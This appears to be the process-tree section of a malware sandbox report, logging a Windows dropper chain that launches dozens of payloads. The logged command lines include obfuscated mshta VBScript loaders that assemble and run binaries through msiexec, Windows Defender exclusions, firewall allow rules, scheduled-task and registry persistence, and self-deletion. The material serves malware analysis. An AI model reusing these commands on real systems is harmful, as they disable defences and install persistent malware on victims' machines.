C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe"C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im PDfBHekEZT5OMx90P2VlexN_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im PDfBHekEZT5OMx90P2VlexN_.exe /f8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\GVWxGcTkVG1E9ZlalBgFFCiB.exe"C:\Users\Admin\Pictures\Adobe Films\GVWxGcTkVG1E9ZlalBgFFCiB.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\rDuszRYcVapYdiu1d2yWoFFu.exe"C:\Users\Admin\Pictures\Adobe Films\rDuszRYcVapYdiu1d2yWoFFu.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 6767⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 6367⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 7007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 8287⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\BfVHPw37ayWYt8A2ISyXPrwE.exe"C:\Users\Admin\Pictures\Adobe Films\BfVHPw37ayWYt8A2ISyXPrwE.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\n9phedk_hRTezbT46II1s6bc.exe"C:\Users\Admin\Pictures\Adobe Films\n9phedk_hRTezbT46II1s6bc.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
-
C:\Users\Admin\Pictures\Adobe Films\BzUg549KEPuPomNn7fpJjZ3o.exe"C:\Users\Admin\Pictures\Adobe Films\BzUg549KEPuPomNn7fpJjZ3o.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu1231d30cda84872.exeThu1231d30cda84872.exe5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu120bfbc2443b3b5d.exeThu120bfbc2443b3b5d.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu125e541847539.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exeThu125e541847539.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OK50H.tmp\Thu125e541847539.tmp"C:\Users\Admin\AppData\Local\Temp\is-OK50H.tmp\Thu125e541847539.tmp" /SL5="$502C0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe"C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe" /SILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P5TH0.tmp\Thu125e541847539.tmp"C:\Users\Admin\AppData\Local\Temp\is-P5TH0.tmp\Thu125e541847539.tmp" /SL5="$6027C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe" /SILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9OLT9.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-9OLT9.tmp\postback.exe" ss19⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12b275ee70c7e913.exeThu12b275ee70c7e913.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
-
C:\ProgramData\4842156.exe"C:\ProgramData\4842156.exe"8⤵
-
C:\ProgramData\4063449.exe"C:\ProgramData\4063449.exe"8⤵
-
C:\ProgramData\6774152.exe"C:\ProgramData\6774152.exe"8⤵
-
C:\ProgramData\1322331.exe"C:\ProgramData\1322331.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Soft1WW02.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 6848⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 8368⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 8888⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 9008⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 9408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 10128⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6020 -s 15288⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12ca1c119bc29.exeThu12ca1c119bc29.exe /mixone5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu12ca1c119bc29.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12ca1c119bc29.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu12ca1c119bc29.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu12493eba7a.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu12912263469836d.exe4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu126011caea28.exe4⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exeThu126011caea28.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exeC:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exeThu12493eba7a.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"3⤵
-
C:\Users\Admin\AppData\Local\Temp\yDhNY.ExeyDhNY.exe /pFKkSWJQc5v2ppVFMo4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S76⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"7⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y .\ISA502G.S77⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "Thu12493eba7a.exe"4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12465fe68f85b6156.exeThu12465fe68f85b6156.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu1262fd911d3e6320.exeThu1262fd911d3e6320.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu122f7469b214cb59.exeThu122f7469b214cb59.exe1⤵
-
C:\Users\Admin\AppData\Roaming\4402660.exe"C:\Users\Admin\AppData\Roaming\4402660.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\5912648.exe"C:\Users\Admin\AppData\Roaming\5912648.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\1030691.exe"C:\Users\Admin\AppData\Roaming\1030691.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\6168135.exe"C:\Users\Admin\AppData\Roaming\6168135.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\3942899.exe"C:\Users\Admin\AppData\Roaming\3942899.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exeC:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe /usthree SUB=2fe3d428284ff9b385bc1c941892777b1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ugRrXBaN9Ln.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ugRrXBaN9Ln.exe" /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"3⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30004⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\42ED.exeC:\Users\Admin\AppData\Local\Temp\42ED.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\42ED.exeC:\Users\Admin\AppData\Local\Temp\42ED.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\24D2.exeC:\Users\Admin\AppData\Local\Temp\24D2.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\C5A7.exeC:\Users\Admin\AppData\Local\Temp\C5A7.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\DAF5.exeC:\Users\Admin\AppData\Local\Temp\DAF5.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E40E.exeC:\Users\Admin\AppData\Local\Temp\E40E.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14160 -s 9722⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\F100.exeC:\Users\Admin\AppData\Local\Temp\F100.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\12D1.exeC:\Users\Admin\AppData\Local\Temp\12D1.exe1⤵
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\3ABD.exeC:\Users\Admin\AppData\Local\Temp\3ABD.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\3ABD.exe"C:\Users\Admin\AppData\Local\Temp\3ABD.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\9D50.exeC:\Users\Admin\AppData\Local\Temp\9D50.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E45D.exeC:\Users\Admin\AppData\Local\Temp\E45D.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\玁獹獎玃獍獨獎獽獇獈獻獎獍獛獼\svchost.exe" -Force2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\E45D.exe" -Force2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\玁獹獎玃獍獨獎獽獇獈獻獎獍獛獼\svchost.exe" -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe" /SpecialRun 4101d8 135203⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\E45D.exe" -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\E45D.exeC:\Users\Admin\AppData\Local\Temp\E45D.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\E45D.exeC:\Users\Admin\AppData\Local\Temp\E45D.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\E45D.exeC:\Users\Admin\AppData\Local\Temp\E45D.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\EAA7.exeC:\Users\Admin\AppData\Local\Temp\EAA7.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EAA7.exe" -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
